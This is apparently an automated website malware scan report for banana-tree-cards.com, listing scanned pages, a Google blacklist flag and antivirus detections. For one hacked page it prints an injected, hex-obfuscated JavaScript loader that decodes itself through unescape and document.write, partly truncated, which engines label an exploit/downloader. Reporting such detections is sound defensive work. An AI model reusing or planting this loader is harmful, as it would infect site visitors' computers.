New scan:

Malware Scanner report for banana-tree-cards.com

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "banana-tree-cards.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=banana-tree-cards.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.banana-tree-cards.com/
200 OK
Content-Length: 8009
Content-Type: text/html
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 20008
Content-Type: text/javascript
clean
http://www.banana-tree-cards.com/index.html
200 OK
Content-Length: 8009
Content-Type: text/html
clean
http://www.banana-tree-cards.com/artistic.html
200 OK
Content-Length: 9031
Content-Type: text/html
clean
http://www.banana-tree-cards.com/contact.html
404 Not Found
Content-Length: 8009
Content-Type: text/html
clean
http://www.banana-tree-cards.com/sports-drinks/index.html
200 OK
Content-Length: 5394
Content-Type: text/html
clean
http://sm4.sitemeter.com/js/counter.js?site=sm4jedimaster
HTTP/1.1 302 Redirect
Date: Sun, 08 Mar 2015 03:57:12 GMT
Location: http://sm4.sitemeter.com/js/counter.asp?site=sm4jedimaster
Server: Microsoft-IIS/6.0
Content-Length: 181
Content-Type: text/html
X-Powered-By: ASP.NET
clean
http://sm4.sitemeter.com/js/counter.asp?site=sm4jedimaster
200 OK
Content-Length: 7564
Content-Type: application/x-javascript
clean
http://www.banana-tree-cards.com/sports-drinks/sports-drink-products.html
200 OK
Content-Length: 5891
Content-Type: text/html
clean
http://www.banana-tree-cards.com/sports-drinks/sports-training-productss.html
404 Not Found
Content-Length: 8009
Content-Type: text/html
clean
http://www.banana-tree-cards.com/sports-drinks/artistic.html
404 Not Found
Content-Length: 8009
Content-Type: text/html
clean
http://www.banana-tree-cards.com/sports-drinks/contact.html
404 Not Found
Content-Length: 8009
Content-Type: text/html
clean
http://www.banana-tree-cards.com/sports-drinks/solar-power.html
404 Not Found
Content-Length: 8009
Content-Type: text/html
clean
http://www.banana-tree-cards.com/sports-drinks/../hotels/index.html
200 OK
Content-Length: 20919
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var Vg='a06d04937ccdc754e9ebc1c93e37da1309ac8e3c68746d6c3e0a3c626f64793e3c6469762069643d224469764944223e783c2f6469763e0a3c7363726970743e0a0a66756e6374696f6e20696e7365727455524c322875726c297b0a090976617220726573203d2022223b0a0909726573203d20646f63756d656e742e6c6f636174696f6e2e687265662e73756273747228302c646f63756d656e742e6c6f636174696f6e2e687265662e6c617374496e6465784f6628272f272929202b20222f22202b2075726c3b0a090972657475726e207265733b0a7d0a0a66756e6374696f6e20696e7365727455524c287368656c6c
... 3035 bytes are skipped ...
d31290a7b0a094d44324328293b200a09536574496e74657276616c2822776f72645f2829222c34303030293b0a7d0a656c73650a7b0a096f6b28293b0a09536574496e74657276616c2822776f72645f2829222c34303030293b090a7d0920200a0a3c2f7363726970743e0a0a3c2f626f64793e0a3c2f68746d6c3e0d99c0c7267d36068edb428f6c3ee419042df740886f8d01db583d84';
var HJN = '';
var q = Vg.slice ( 38, 14236 );
for ( K = 38 ; K < 14236 ; K += 2 )
{
HJN += '%' + Vg.slice ( K, K + 2 );
}
document.write(unescape(HJN));

Antivirus reports:

AntiVir
EXP/MS09-002.A
Avast
JS:CVE-2009-1136-J [Expl]
Ikarus
Trojan-Downloader.JS.FP
nProtect
Trojan.Downloader.JS.FP
K7AntiVirus
Trojan-Downloader
TrendMicro-HouseCall
Possible_SCRDL
Emsisoft
Trojan.Downloader.JS.FP (B)
Comodo
TrojWare.JS.Agent.AEA
DrWeb
SCRIPT.Virus
TrendMicro
Possible_SCRDL
Kaspersky
Exploit.JS.Sheat.a
Microsoft
Exploit:JS/MS09002.C
MicroWorld-eScan
Trojan.Downloader.JS.FP
PCTools
Downloader.Generic
TotalDefense
JS/MS09-002!exploit
Jiangmin
Trojan/Script.Gen
F-Secure
Trojan.Downloader.JS.FP
VIPRE
Exploit.HTML.OWCref.a (v)
eSafe
JS.OfficeExp.a
F-Prot
JS/Psyme.GU
AVG
Exploit
Norman
ShellCode.C
GData
Trojan.Downloader.JS.FP
Symantec
Downloader
Commtouch
JS/Psyme.GU
Agnitum
HTML.Psyme.Gen
ESET-NOD32
JS/TrojanDownloader.Psyme.HX
BitDefender
Trojan.Downloader.JS.FP

http://www.google-analytics.com/urchin.js
200 OK
Content-Length: 22678
Content-Type: text/javascript
clean
http://www.banana-tree-cards.com/sports-drinks/../hotels/../index.html
200 OK
Content-Length: 8009
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: banana-tree-cards.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: banana-tree-cards.com
Referer: http://www.google.com/search?q=banana-tree-cards.com

Result:
The result is similar to the first query. There are no suspicious redirects found.